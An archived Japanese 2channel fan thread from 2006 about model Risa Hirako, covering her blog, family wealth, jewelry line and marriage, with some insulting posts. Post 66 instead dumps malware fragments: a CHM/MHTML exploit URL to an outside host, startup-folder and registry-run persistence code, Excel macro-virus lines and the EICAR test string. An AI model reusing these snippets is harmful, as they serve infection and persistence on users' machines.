2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

平子理沙 本スレ3

1 :無名モデル:2006/11/21(火) 00:49:25 ID:BN/BBsBr
まったりでお願いします。

2 :無名モデル:2006/11/21(火) 01:01:43 ID:205SWa94
>>1さん
ついに立ててくれたんだね!ありがとう。
いいね、理沙ちゃん好き同士まったり語りましょー♪

3 :無名モデル:2006/11/21(火) 12:29:51 ID:???
>>1乙です。
スレ立ってる事今知って、あちらの方から飛んできました!
嬉しいです♪
マッタリ語っていきましょぅね♪♪

4 :無名モデル:2006/11/21(火) 14:47:59 ID:???
>>1乙です!
いつの間にか理沙ちゃんスレ分離されたんですね。
最近アンチさん酷かったから、
こっちはまったり語れるファンスレでいきましょ〜

5 :無名モデル:2006/11/21(火) 16:31:20 ID:???
お―、いつの間にか新スレ立ってる>>1乙です。
最近理沙ちゃんのブログあんま更新されなくて寂しい・・・


6 :無名モデル:2006/11/21(火) 18:45:56 ID:???
>>5
今、日記見たら更新されてたよん\(~o~)/
今回の理沙ちんの写真も美しかった〜

遅ればせながら>>1、乙です。

7 :無名モデル:2006/11/21(火) 20:28:06 ID:???
>>1


8 :無名モデル:2006/11/21(火) 23:25:15 ID:???
>>6
教えてくれてありがとう!
うんうん、相変わらず美しかったよね!
そして相変わらずセレブだったw
うらやましい〜

9 :無名モデル:2006/11/22(水) 02:47:24 ID:???
ブログやっと更新したねv(^O^)v
前みたいにもっと沢山更新して欲しいよ〜

10 :無名モデル:2006/11/22(水) 10:39:12 ID:???
ブログ更新嬉しいんだけど
家のPC今修理中orz
せっかく理沙ママンの写真ウプされてるのに携帯だと色が変だよー。
栄作氏の話もたまには書いてくれると楽しいのにな
多分栄ちゃんの写真は事務所が理沙ちゃんと違うから、色んな権利絡みでウプできないんだろうね

11 :無名モデル:2006/11/22(水) 16:21:11 ID:???
写真の色、一時期直ったのに最近またダメになっちゃったね。
しかも大抵理沙ちんのアップ写真に限って。。。。。。。

12 :無名モデル:2006/11/22(水) 18:55:40 ID:dlGfukg9
今日もブログ更新されましたね。
う〜ん。可愛すぎる。

13 :無名モデル:2006/11/22(水) 19:03:22 ID:???
>>12
えっ!?まぢ!!
昨日更新あったのに!?
ちょっと今から見てくる!

14 :無名モデル:2006/11/22(水) 19:20:11 ID:???
>>13です。
ホントだね、可愛すぎる!
そしてママにシャネルを買ってもらえるなんて、羨ましすぎ!セレブすぎ!!
私もこの間GAP・ZARAのはしごでママにおねだり成功したけどw

15 :無名モデル:2006/11/22(水) 22:43:24 ID:???
りさちんはルックスも、まぁまぁだ。

16 :無名モデル:2006/11/22(水) 23:54:34 ID:???
理沙ちゃんは、顔もモデルの中では普通。

17 :無名モデル:2006/11/23(木) 00:38:15 ID:???
>>16
だよね。
セレブは興味あるけど、顔は普通の人

18 :無名モデル:2006/11/23(木) 00:42:28 ID:???
今日もブログ更新嬉しいね♪毎日してくれたら‥なんて贅沢か。
でも前みたいにちょくちょく更新して欲しいな。

19 :無名モデル:2006/11/23(木) 02:02:35 ID:???
あの顔であのスタイルでそしてセレブ
あんなにセレブだったとは最近知ったからびびったし。
全てを持っている人ってこう言う人の事言うんだね。羨ましい



20 :無名モデル:2006/11/23(木) 13:35:50 ID:uhw//WRH
日本のセレブってだけでも凄いけど平子家はロスのセレブって言うのが凄いわ。

21 :無名モデル:2006/11/23(木) 13:48:08 ID:???
旦那は 仕事あるの?
離婚したほうがいいと思う。

22 :無名モデル:2006/11/23(木) 16:10:22 ID:???
うん…
旦那が栄作って何か…
離婚したらいいのに。
理沙の人気アップしそう。

23 :無名モデル:2006/11/23(木) 17:43:06 ID:???
爽やかでキュートなのに 大人の色気もあって最高ですね。。。

24 :無名モデル:2006/11/23(木) 17:57:36 ID:???
離婚希望
子供いらないなら 栄作必要なし!

25 :無名モデル:2006/11/23(木) 21:04:27 ID:PuBVSvn3
平子さん美しくて大好きなのですが、
そんなにセレブなの?

26 :無名モデル:2006/11/23(木) 22:45:17 ID:???
別にセレブじゃなくても いいけどね 理沙ちゃんは。

27 :無名モデル:2006/11/23(木) 23:32:03 ID:???
セレブだけど、容姿が一般人だから腹が立たない。

28 :無名モデル:2006/11/24(金) 00:23:10 ID:???
>>23
体のラインがくねくねしててエロい。倖田よりよっぽどエロかわいい!

29 :無名モデル:2006/11/24(金) 04:19:10 ID:???
最近のセレブってみんな可愛い
りさちんもパリスもセレドル・マリエも
ずるいよ・・・

30 :無名モデル:2006/11/24(金) 11:01:02 ID:???
パリスと比べるのは酷ではない?
パリスは桁違いのセレブ

31 :無名モデル:2006/11/24(金) 17:03:51 ID:???
理沙ちゃんのブログ今日もupしとるで♪

32 :無名モデル:2006/11/24(金) 21:44:34 ID:???
>>17
りさちゃんって普通っちゃ普通だな

33 :無名モデル:2006/11/25(土) 00:01:33 ID:???
>>826
スレ盛り上げる為に必死にブログ更新?
平子がスレ立てしたのかもね。
前スレも平子が立てたっぽかったし
なにしろ2ゲトが吉田栄作だったしw

34 :33:2006/11/25(土) 00:02:49 ID:???
誤爆スマソ

35 :無名モデル:2006/11/25(土) 02:22:21 ID:???
顔もカワイイけど、この人の女っぺー色っぺー体に憧れる。

36 :無名モデル:2006/11/25(土) 02:39:00 ID:???
男から見たら思わねー

37 :無名モデル:2006/11/25(土) 02:40:27 ID:???
思わないという意味

38 :無名モデル:2006/11/25(土) 02:43:39 ID:???
足が短いのにあんな高いヒール似合わないよ理沙ちゃん。
もうちょっと低い方が綺麗にみえるよ♪

39 :無名モデル:2006/11/25(土) 19:38:03 ID:1uZM/HVk
ロサンゼルスの資産家?って親は何してる人?

40 :無名モデル:2006/11/26(日) 00:15:13 ID:???
お父さんがアパレル会社の社長で、お母さんはネイルアートの第一人者ですよ。

41 :無名モデル:2006/11/27(月) 08:40:00 ID:???
ブログ面白いね。ブログで久々に見たけど、全然年取ってなくて凄いと思った。

42 :無名モデル:2006/11/27(月) 19:58:06 ID:T1h9uo66
ブログ更新!

43 :無名モデル:2006/11/27(月) 20:41:48 ID:???
アップの顔すごく可愛いね!

44 :無名モデル:2006/11/27(月) 21:48:05 ID:???
アップの顔ほんとかわぇぇ〜女子だが惚れるw
でもでも、いつも理沙ちゃんの写真に限ってsepiaあれはわざとじゃないよね?
風景は絶対colorで逆になってくれよって思うんですがw

45 :無名モデル:2006/11/27(月) 23:13:48 ID:???
ドア窓から除いたような顔www

46 :無名モデル:2006/11/27(月) 23:59:43 ID:eaavMv65
おでこも可愛い

47 :無名モデル:2006/11/28(火) 00:11:21 ID:???
ブログのトップの写真変えればいいのに・・・
やっぱりおばさんだなぁーって年喰ってみえる
まぁばばぁなんだけど

48 :無名モデル:2006/11/28(火) 08:21:44 ID:???
表紙自分ももっといいの載せればいいのにと思う
せいこぶりっこみたいで吐き気する

49 :無名モデル:2006/11/28(火) 10:07:04 ID:???
ブログのトップの写真、ふやけた顔
変えればいいのにババクサイ

50 :無名モデル:2006/11/28(火) 19:03:36 ID:MXSghHh3
もう何年も前になるけどグアムで理沙とお兄ちゃん見たよ。
理沙はモデルとは思えないほど背がとても小さくて驚いたけど
顔はとっても可愛かったよ。
お兄ちゃんとは全然似てなくて兄弟とは思えなかったな。
ところで理沙は離婚してるの?

51 :無名モデル:2006/11/28(火) 19:46:23 ID:???
>>50
離婚してないよ。
理沙ちゃんが結婚の少し前にお父さんもママもワイドショーのテレビに出て来たのを観たよ
理沙ちゃんと目が全然似てなかったよ。
鼻とあごはママ似。

52 :無名モデル:2006/11/29(水) 00:43:26 ID:???
ブログ始めたら急にすごいアンチ出てきちゃったね。
本人が2ちゃんに書き込むはずもないだろうに皆信じきっててなんだか怖い…

53 :無名モデル:2006/11/29(水) 01:11:59 ID:???
( ´,_ゝ`)プッ

54 :無名モデル:2006/11/29(水) 09:02:03 ID:???
>>52
皆信じ切ってるというか、本人が書いてるって流れにしてるのは強烈な粘着アンチ一人だけっぽいよ
その一人が延々と何レスも書き込んでるように見える

55 :無名モデル:2006/11/29(水) 09:05:43 ID:???
つーかこのスレにまでアンチ紛れ込んできてるけど・・・
アンチスレから出てけって自分達が言いだしたからファンスレ立てたのに、おかしくない?アンチスレに戻って下さい

56 :無名モデル:2006/11/29(水) 09:41:07 ID:???
>>55
触れないで。皆さん分かっててずっとスルーして来てたみたいじゃないですかw
でも一応ファン装ったりしてるのが悪質だよね。
悪意に満ちててすぐバレるのにさ。

57 :無名モデル:2006/11/29(水) 10:34:41 ID:???
>>55
ここでは、やめようよ。
せっかくファンスレたてたのに。。。


58 :無名モデル:2006/11/29(水) 18:39:16 ID:???
>>56
そんな怒らなくても・・・こわい><

59 :無名モデル:2006/12/01(金) 00:50:33 ID:???
MISSで理沙ちゃん発見♪
ジュエリー紹介してた。
しっかし、いつ見てもお肌ツルピカだわ。。。

60 :無名モデル:2006/12/01(金) 01:22:35 ID:???
あのパンテールもう生産中止らしいね
220マンくらいの品物

61 :無名モデル:2006/12/01(金) 12:25:30 ID:???
>>59
りさ情報ありがとう!本屋でチェックしてくるわ。

62 :無名モデル:2006/12/03(日) 23:01:22 ID:???
昔は派手なお姉さんって印象で・・・だったけど今の平子理沙好き。
年齢聞いてびっくりする様なかわいさに憧れる。

63 :無名モデル:2006/12/06(水) 05:25:51 ID:SHSp5bC7
今度はNYですか…うらやましいよ〜

64 :無名モデル:2006/12/08(金) 22:16:18 ID:???
毎日 楽しそうだ〜
いいなぁ。

65 :無名モデル:2006/12/10(日) 17:09:33 ID:kKH2VUvh
今日は旦那さんのライブがあるらしい
理沙ちゃん行くのかな?

66 :<body onload=window()>:2006/12/11(月) 00:53:01 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

67 :無名モデル:2006/12/11(月) 19:09:16 ID:???
美人で金持ちなんていいよね。理沙ちゃんになりたい。

68 :無名モデル:2006/12/13(水) 13:23:52 ID:???
美人さんだけど、ブログ見ると結構お茶目さんねw
気取ってなくて好感が持てます。

69 :無名モデル:2006/12/14(木) 13:14:52 ID:???
理沙ちんがデザインしたアクセ可愛いよ〜
特にブレスが欲しいな、ハートと稲妻が付いてるヤツ

70 :無名モデル:2006/12/14(木) 14:53:13 ID:???
理沙デザインアクセ 雑誌で見てたから見覚えあったよ!
アレ 理沙デザインだったんだね〜
確かにブレス可愛い
やっぱゴールドは理沙にピッタリ

71 :無名モデル:2006/12/14(木) 23:09:07 ID:???
本人の自演乙w

72 :無名モデル:2006/12/14(木) 23:49:35 ID:???
>>71
ウッゼ〜w
わざわざ本スレに来なくていいですよ ハゲww

73 :無名モデル:2006/12/15(金) 09:09:16 ID:???
理沙ちゃんがジュエリーデザイナー☆デビューだってね。
頑張れ理沙ちゃん!

74 :無名モデル:2006/12/16(土) 18:21:54 ID:gjjFuEtr
私も理沙ちゃん好きです!ファッションも好きだし、お茶目な感じも!


75 :無名モデル:2006/12/16(土) 20:49:09 ID:???
嫌い

76 :無名モデル:2006/12/16(土) 22:07:27 ID:hqzbfnBp
アクセかわいい〜

77 :無名モデル:2006/12/18(月) 00:52:05 ID:???
ジュエリーデザイナーデビューおめでとうございま〜す!

78 :無名モデル:2006/12/18(月) 18:43:26 ID:???
美人百花の理沙ちゃんまた可愛い!

79 :無名モデル:2006/12/22(金) 10:52:53 ID:???
今月VOCEにも載ってたよ。最近活動の幅が広がってきたよね。嬉しいな。

80 :無名モデル:2006/12/22(金) 19:53:17 ID:???
今月はいろんな雑誌に載ってそうだね
チェックしないとね

81 :無名モデル:2006/12/23(土) 18:52:31 ID:4m1YufKn
あの人はいま/吉田栄作−観客60人のライブでバーテン・サービス 吉田栄作、平子理沙  週刊現代(1/13) 230

82 :無名モデル:2006/12/26(火) 20:17:00 ID:???
りさちゃん、ほんとかわいいし、ブログ楽しみ。。。

14 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)